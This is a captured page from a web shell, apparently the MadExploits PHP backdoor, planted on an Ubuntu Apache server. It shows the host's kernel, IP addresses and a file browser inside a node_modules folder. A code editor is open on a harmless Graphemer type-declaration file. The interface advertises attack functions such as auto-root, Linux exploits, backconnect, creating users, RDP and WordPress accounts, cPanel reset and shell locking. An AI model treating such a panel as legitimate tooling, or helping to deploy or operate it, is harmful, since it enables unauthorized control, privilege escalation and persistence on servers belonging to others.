Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
graphemer /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
Graphemer.d.ts
1.36
KB
-rw-rw-r--
Graphemer.d.ts.map
575
B
-rw-rw-r--
Graphemer.js
767.59
KB
-rw-rw-r--
GraphemerHelper.d.ts
1.23
KB
-rw-rw-r--
GraphemerHelper.d.ts.map
520
B
-rw-rw-r--
GraphemerHelper.js
6.53
KB
-rw-rw-r--
GraphemerIterator.d.ts
610
B
-rw-rw-r--
GraphemerIterator.d.ts.map
424
B
-rw-rw-r--
GraphemerIterator.js
1.05
KB
-rw-rw-r--
boundaries.d.ts
1005
B
-rw-rw-r--
boundaries.d.ts.map
471
B
-rw-rw-r--
boundaries.js
1.91
KB
-rw-rw-r--
index.d.ts
98
B
-rw-rw-r--
index.d.ts.map
154
B
-rw-rw-r--
index.js
316
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Graphemer.d.ts
import GraphemerIterator from './GraphemerIterator'; export default class Graphemer { /** * Returns the next grapheme break in the string after the given index * @param string {string} * @param index {number} * @returns {number} */ static nextBreak(string: string, index: number): number; /** * Breaks the given string into an array of grapheme clusters * @param str {string} * @returns {string[]} */ splitGraphemes(str: string): string[]; /** * Returns an iterator of grapheme clusters in the given string * @param str {string} * @returns {GraphemerIterator} */ iterateGraphemes(str: string): GraphemerIterator; /** * Returns the number of grapheme clusters in the given string * @param str {string} * @returns {number} */ countGraphemes(str: string): number; /** * Given a Unicode code point, determines this symbol's grapheme break property * @param code {number} Unicode code point * @returns {number} */ static getGraphemeBreakProperty(code: number): number; /** * Given a Unicode code point, returns if symbol is an extended pictographic or some other break * @param code {number} Unicode code point * @returns {number} */ static getEmojiProperty(code: number): number; } //# sourceMappingURL=Graphemer.d.ts.map
Close